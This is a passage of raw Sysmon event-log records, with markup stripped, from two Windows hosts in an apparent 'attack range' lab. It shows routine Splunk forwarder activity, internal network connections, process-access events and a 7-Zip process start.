Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2145C2AA854B7B22F052E9FE80E9718E,SHA256=C79E44A190A2307A9C040B48FE8140E8AC2C0C2C8790B8E3C5392478B6B098E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:40.960{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94CB30442088D48C647FD2AE93F4BE44,SHA256=8944A6621FAF66D687F7CEBA123A0CB37966A44F852266383847F434C3454868,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:37.653{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53350-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:41.960{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51C74FD1784D6EDE278C503D0A5C5A9A,SHA256=9EAE89B6A033C9CC9EEE505AAEAB8AF0D2CE4833D50A17857F7F55D13E961DD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215546Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:41.994{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA81AFAEF07C3B5A9ACFB06E6AD34589,SHA256=30F7CEBBB17CA0B7CF104B0E56901263D405198E6D32630127B82D89BE342178,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:41.726{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000286678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:39.122{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53351-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000286681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:42.976{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E634EF7A1929789C28433E61BFF2D903,SHA256=5A21C2C89E0A7FEFE161A451DFD83230109A605E0DF4771F31BA514F13F7458C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215547Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:39.652{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51267-false10.0.1.12-8000- 23542300x8000000000000000286683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:43.992{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F180341D8D176CB016CA7343A1457025,SHA256=AA7AE25B3375BEA8A3C491734B647882CD2522B0065D540D9988A89EF6144FD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215548Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:43.010{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7953F05CE1FB46D149D722CBEFF810B3,SHA256=1F1B8DDCCD196E13A45C523879469F61075DE66FF271AD6D8F92AC7BCD7CECED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:43.509{C8EA50B7-F11F-6215-1500-000000003802}10921680C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215549Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:44.213{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DF27B354C1AC1140D9842DA3A0301FF,SHA256=803E8ABF6C66B42BA8DC0885116BEBA685E9D96433453D789C29EC88D7DC967C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215578Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.869{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215577Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-101D-6216-2E04-000000003902}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215576Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215575Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215574Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215573Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215572Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215571Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215570Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215569Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215568Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215567Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-101D-6216-2E04-000000003902}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215566Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.697{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-101D-6216-2E04-000000003902}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215565Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.698{4F8D34B0-101D-6216-2E04-000000003902}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000215564Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.510{4F8D34B0-101D-6216-2D04-000000003902}25323604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215563Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.260{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4085A784DDDC537A3F738445EE573027,SHA256=770C046D27E2E01780BF4575D6035F13CA56DD71F5999FED669358B6DBF9AF9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.648{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.476{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.476{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.476{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:45.476{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-101D-6216-E104-000000003802}2136C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 